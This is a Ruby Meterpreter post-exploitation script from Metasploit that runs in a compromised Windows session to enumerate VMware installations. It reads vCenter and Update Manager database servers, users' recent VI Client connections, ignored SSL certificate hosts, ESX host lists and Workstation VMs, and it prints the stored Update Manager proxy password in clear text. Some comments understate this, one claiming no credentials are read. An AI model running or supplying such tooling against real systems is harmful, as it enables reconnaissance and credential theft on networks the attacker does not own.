##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##


# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
# Meterpreter scripts run with `client` bound to the current session; the
# helper methods below reach it through this instance variable.
@client = client

# Command-line handling: the only option is the help text.
arg_parser = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)

arg_parser.parse(args) do |opt, _idx, _val|
  next unless opt == "-h"

  print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
  print_line("USAGE: run vmware_enum")
  print_line(arg_parser.usage)
  raise Rex::Script::Completed
end

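# Lists the VMware product subkeys registered under
# HKLM\SOFTWARE\VMware, Inc. and prints each one.
#
# The registry handle is released in an +ensure+ block so that a failing
# +enum_key+ cannot leak the open key (check_vmsoft closes its key too).
#
# @return [Array<String>] the subkey (product) names found
def check_prods
  key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
  begin
    products = key.enum_key
  ensure
    key.close
  end
  print_status("The Following Products are installed on this host:")
  products.each { |product| print_status("\t#{product}") }
  products
end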

# Answers whether a "VMware, Inc." vendor key exists under HKLM\SOFTWARE,
# printing a status or error line accordingly.
#
# @return [Boolean] true when the vendor key is present
def check_vmsoft
  software = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
  vendor_present = software.enum_key.include?("VMware, Inc.")
  if vendor_present
    print_status("VMware Products are Installed in Host")
  else
    print_error("No VMware Products where found in this Host.")
  end
  software.close
  vendor_present
end

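# Prints the VirtualCenter (vCenter) installation details recorded under
# HKLM\SOFTWARE\VMware, Inc.\VMware VirtualCenter and resolves the DSN
# registered in its DB subkey to a database name and server through
# HKLM\SOFTWARE\ODBC\ODBC.INI. Only configuration metadata is read here;
# no credential values.
#
# The ODBC.INI lookup is skipped when no DSN name is registered — calling
# +chomp+ on a nil value would otherwise raise and abort the whole script.
def enum_vcenter
  print_status("Information about Virtual Center:")
  vc_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter"
  vc_version    = registry_getvaldata(vc_key, "InstalledVersion")
  vc_serial     = registry_getvaldata(vc_key, "Serial")
  vc_dbinstance = registry_getvaldata(vc_key, "DBInstanceName")
  vc_dbtype     = registry_getvaldata(vc_key, "DBServerType")
  vc_type       = registry_getvaldata(vc_key, "GroupType")
  vc_tomcatver  = registry_getvaldata("#{vc_key}\\Tomcat", "Version")
  # The DB subkey uses numbered value names: "1" holds the ODBC name, "4" the ODBC type.
  vc_odbcname = registry_getvaldata("#{vc_key}\\DB", "1")
  vc_odbctype = registry_getvaldata("#{vc_key}\\DB", "4")

  vc_dbname = vc_dbserver = nil
  dsn = vc_odbcname.to_s.chomp
  unless dsn.empty?
    odbc_key = "HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}"
    vc_dbname   = registry_getvaldata(odbc_key, "Database")
    vc_dbserver = registry_getvaldata(odbc_key, "Server")
  end

  print_status("\tVersion: #{vc_version}")
  print_status("\tSerial: #{vc_serial}")
  print_status("\tvCenter Type: #{vc_type}")
  print_status("\tTomcat Version: #{vc_tomcatver}")
  print_status("\tDatabase Instance: #{vc_dbinstance}")
  print_status("\tDatabase Type: #{vc_dbtype}")
  print_status("\tDatabase Name: #{vc_dbname}")
  print_status("\tDatabase Server: #{vc_dbserver}")
  print_status("\tODBC Name: #{vc_odbcname}")
  print_status("\tODBC Type: #{vc_odbctype}")
end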

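# Reports the VI Client installation (version and plugins from HKLM) and,
# per user, the saved recent connections plus the hosts whose SSL
# certificate warnings were dismissed together with the stored fingerprint
# (dismissed warnings mark hosts whose TLS identity was never verified —
# useful for the host's owner to review).
#
# Without SYSTEM privileges only the current user's HKCU hive is readable;
# as SYSTEM every loaded hive under HKU whose name is an account SID is
# inspected. A hive without VI Client preferences is reported as "appears to
# have not used the software" instead of aborting the script.
#
# Fixes relative to the upstream logic: the per-user SSLIgnore path named the
# hive "HCU" (not a hive, so every lookup failed), the current-user branch had
# no error handling at all, and the HKU handle was never closed.
def enum_viclient
  print_status("Information about VMware VI Client:")
  viclient_print_install_info

  if is_system?
    viclient_user_sids.each do |sid|
      begin
        enumed_user = registry_getvaldata("HKU\\#{sid}\\Volatile Environment", "USERNAME")
        viclient_print_prefs("HKU\\#{sid}\\Software\\VMware", enumed_user)
      rescue StandardError
        print_status("\tUser appears to have not used the software.")
      end
    end
  else
    begin
      viclient_print_prefs("HKCU\\Software\\VMware", nil)
    rescue StandardError
      print_status("\tUser appears to have not used the software.")
    end
  end
end

# Prints the installed VI Client version and the registered plugin names,
# mapping the known "Converter" and "UM" entries to their product names.
# Both reads are best-effort: a failure leaves the version empty and the
# plugin list as whatever was read before it.
def viclient_print_install_info
  vi_version = nil
  vi_plugins = nil
  begin
    vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0", "InstalledVersion")
    vi_plugins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
  rescue StandardError
    # best-effort: the key set differs between client versions
  end
  print_status("\tVersion: #{vi_version}")
  Array(vi_plugins).each do |plugin|
    case plugin
    when /Converter/ then print_status("\tPlugin: VMware Converter")
    when /UM/        then print_status("\tPlugin: VMware Update Manager")
    else                  print_status("\tPlugin: #{plugin}")
    end
  end
end

# Prints the saved connections and ignored-certificate hosts stored under
# +base+ ("HKCU\Software\VMware" or "HKU\<SID>\Software\VMware").
# +user+ is the account name shown in the headings, or nil for the current
# user (whose headings carry no name).
#
# NOTE(review): the two preference paths differ ("VMware Infrastructure
# Client" vs "Virtual Infrastructure Client"); kept exactly as upstream wrote
# them — confirm against a real installation.
#
# @raise whatever the registry helpers raise when the hive lacks the keys;
#   callers treat that as "software not used by this account"
def viclient_print_prefs(base, user)
  recent = registry_getvaldata("#{base}\\VMware Infrastructure Client\\Preferences", "RecentConnections")
  if recent.nil?
    print_status("\tUser appears to have not used the software.")
    return
  end
  print_status(user ? "\tRecent VI Client Connections for #{user}:" : "Recent VI Client Connections:")
  recent.to_s.split(",").each { |conn| print_status("\t#{conn}") }

  ssl_key = "#{base}\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore"
  ignored = Array(registry_enumkeys(ssl_key))
  return if ignored.empty?

  print_status(user ? "\tIgnored SSL Certs for #{user}:" : "\tIgnored SSL Certs for")
  ignored.each do |host|
    fingerprint = registry_getvaldata(ssl_key, host)
    print_status("\tHost: #{host} SSL Fingerprint: #{fingerprint}")
  end
end

# Returns the HKU subkeys that name an account SID (S-1-5-21-…), i.e. the
# user hives currently loaded, and closes the HKU handle afterwards.
#
# @return [Array<String>]
def viclient_user_sids
  root_key, base_key = @client.sys.registry.splitkey("HKU\\")
  hku = @client.sys.registry.open_key(root_key, base_key)
  begin
    hku.enum_key.select { |name| name.match?(/S-1-5-21-\d*-\d*-\d*-\d{3,6}$/) }
  ensure
    hku.close
  end
end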

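# Prints the Update Manager configuration stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware Update Manager — version, server, patch
# store, proxy and vCenter settings — and resolves the DSN recorded in its
# DB subkey through HKLM\SOFTWARE\ODBC\ODBC.INI.
#
# The ODBC.INI lookup is skipped when no DSN name is registered; calling
# +chomp+ on nil there raised and, because the rescue wraps the whole body,
# suppressed every other line of output. Any StandardError from the registry
# helpers is reported as a single "Error:" line.
def enum_vum
  print_status("Information about VMware Update Manager:")
  vum_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager"
  begin
    vum_version     = registry_getvaldata(vum_key, "InstalledVersion")
    vum_server      = registry_getvaldata(vum_key, "VUMServer")
    vum_dbtype      = registry_getvaldata(vum_key, "DBServerType")
    vum_useproxy    = registry_getvaldata(vum_key, "UseProxy")
    vum_proxyserver = registry_getvaldata(vum_key, "ProxyServer")
    vum_proxyport   = registry_getvaldata(vum_key, "ProxyPort")
    vum_proxyuser   = registry_getvaldata(vum_key, "ProxyUserName")
    vum_proxypass   = registry_getvaldata(vum_key, "ProxyPassword")
    vum_vcentersrv  = registry_getvaldata(vum_key, "VCServer")
    vum_vcenterusr  = registry_getvaldata(vum_key, "VCUserName")
    vum_patchstore  = registry_getvaldata(vum_key, "PatchStore")
    # The DB subkey uses numbered value names: "1" holds the ODBC name, "4" the ODBC type.
    vum_odbcname = registry_getvaldata("#{vum_key}\\DB", "1")
    vum_odbctype = registry_getvaldata("#{vum_key}\\DB", "4")

    vum_dbname = vum_dbserver = nil
    dsn = vum_odbcname.to_s.chomp
    unless dsn.empty?
      odbc_key = "HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{dsn}"
      vum_dbname   = registry_getvaldata(odbc_key, "Database")
      vum_dbserver = registry_getvaldata(odbc_key, "Server")
    end

    print_status("\tVersion: #{vum_version}")
    print_status("\tServer: #{vum_server}")
    print_status("\tPatch Store: #{vum_patchstore}")
    print_status("\tDatabase Type: #{vum_dbtype}") # label previously misspelled "Databse"
    print_status("\tUses Proxy: #{vum_useproxy}")
    print_status("\tProxy User: #{vum_proxyuser}")
    print_status("\tProxy Password: #{vum_proxypass}")
    print_status("\tVirtual Center: #{vum_vcentersrv}")
    print_status("\tVirtual Center User: #{vum_vcenterusr}")
    print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
    print_status("\tDatabase Name: #{vum_dbname}")
    print_status("\tDatabase Server: #{vum_dbserver}")
    print_status("\tODBC Name: #{vum_odbcname}")
    print_status("\tODBC Type: #{vum_odbctype}")
  rescue StandardError => e
    # Deliberately not ::Exception, which would also swallow SystemExit,
    # Interrupt and the script-completion signal.
    print_status("Error: #{e.class} #{e}")
  end
end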

# Prints the VDM broker version recorded under
# HKLM\SOFTWARE\VMware, Inc.\VMware VDM.
def enum_vdm
  broker_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM"
  print_status("Information about VMware VDM Broker:")
  print_status("\tVersion: #{registry_getvaldata(broker_key, "ProductVersion")}")
end

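# Prints the vSphere PowerCLI version and install path from
# HKLM\SOFTWARE\VMware, Inc.\VMware vSphere PowerCLI, plus the machine-wide
# PowerShell execution policy that governs whether PowerCLI scripts may run.
#
# When the ExecutionPolicy value is absent or unreadable the policy is
# reported as "Restricted", the most conservative setting. The "Installed
# Path" label was previously truncated to "Installed Pat".
def enum_powercli
  print_status("Information about PowerCLI:")
  pcli_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI"
  pcli_version = registry_getvaldata(pcli_key, "InstalledVersion")
  pcli_install_path = registry_getvaldata(pcli_key, "InstallPath")
  powershell_policy =
    begin
      registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell", "ExecutionPolicy") || "Restricted"
    rescue StandardError
      "Restricted"
    end
  print_status("\tVersion: #{pcli_version}")
  print_status("\tInstalled Path: #{pcli_install_path}")
  print_status("\tPowershell Execution Policy: #{powershell_policy}")
end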

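# Builds the list of user profiles whose VMware application data should be
# inspected. Running as SYSTEM, every profile directory under the system
# drive is returned (skipping the well-known non-user entries); otherwise
# only the current user's.
#
# Each entry is a Hash with 'username' and 'userappdata', the latter being
# the path to the profile's VMware application-data directory (ending in a
# backslash).
#
# The profile layout is chosen from the OS string: XP-era systems keep
# profiles under "Documents and Settings\<user>\Application Data"; every
# later version uses "Users\<user>\AppData\Local". Matching the small legacy
# set (anchored to the "Windows <name>" prefix) instead of listing modern
# versions keeps Windows 8/10/11 and newer servers on the right branch and
# avoids matching a stray "7" inside a build number.
# NOTE(review): older Meterpreter builds labelled Server 2003 as
# "Windows .NET Server" — confirm that label if 2003 targets still matter.
#
# @return [Array<Hash{String => String}>]
def enum_users
  os = @client.sys.config.sysinfo['OS']
  sysdrv = @client.sys.config.getenv('SystemDrive')

  if os =~ /\AWindows (XP|2000|2003|\.NET Server)\b/
    path4users = "#{sysdrv}\\Documents and Settings\\"
    profilepath = "\\Application Data\\VMware\\"
  else
    path4users = "#{sysdrv}\\users\\"
    profilepath = "\\AppData\\Local\\VMware\\"
  end

  if @client.sys.config.is_system?
    print_status("Running as SYSTEM extracting user list..")
    # Directory entries that are not user profiles.
    skip = /\A(\.|\.\.|All Users|Default|Default User|Public|desktop\.ini|LocalService|NetworkService)\z/
    users = []
    @client.fs.dir.foreach(path4users) do |entry|
      next if entry =~ skip
      users << { 'username' => entry, 'userappdata' => path4users + entry + profilepath }
    end
    users
  else
    current = @client.sys.config.getenv('USERNAME')
    [{ 'username' => current, 'userappdata' => path4users + current + profilepath }]
  end
end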
def enum_vihosupdt
  hosts = []
  print_status("Information about VMware vSphere Host Update Utility:")
  enum_users.each do |u|
    print_status("\tESX/ESXi Hosts added for Updates for user #{u['username']}:")
    begin
    @client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
      next if vmdir =~ /^(\.|\.\.)$/
      print_status("\t#{vmdir}")
    end
    rescue
    end
  end
end

def enum_vmwarewrk
  config = ""
  name = ""
  print_status("Enumerating VMware Workstation VM's:")
  fav_file = ""
  enum_users.each do |u|
    print_status("\tVM's for user #{u['username']}:")
    path = u['userappdata'].gsub(/Local/,"Roaming")
    account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
    until account_file.eof?
      fav_file << account_file.read
    end
  end
  fav_file.each_line do |l|

    if l =~ /config/
      print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
    end
    if l =~ /Name/
      print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
      print_status("")
    end
  end
end
# Entry point: only Windows sessions carry the registry keys this script
# reads. Each VMware product found under the vendor key dispatches to its
# enumeration method; products without a handler are only listed.
if client.platform == 'windows'
  if check_vmsoft
    vmware_products = check_prods()
    handlers = {
      "VMware VirtualCenter"                   => :enum_vcenter,
      "VMware Virtual Infrastructure Client"   => :enum_viclient,
      "VMware Update Manager"                  => :enum_vum,
      "VMware VDM"                             => :enum_vdm,
      "VMware vSphere PowerCLI"                => :enum_powercli,
      "VMware vSphere Host Update Utility 4.0" => :enum_vihosupdt,
      "VMware Workstation"                     => :enum_vmwarewrk
    }
    handlers.each do |product, handler|
      send(handler) if vmware_products.include?(product)
    end
  else
    print_status("No VMware Products appear to be installed in this host")
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end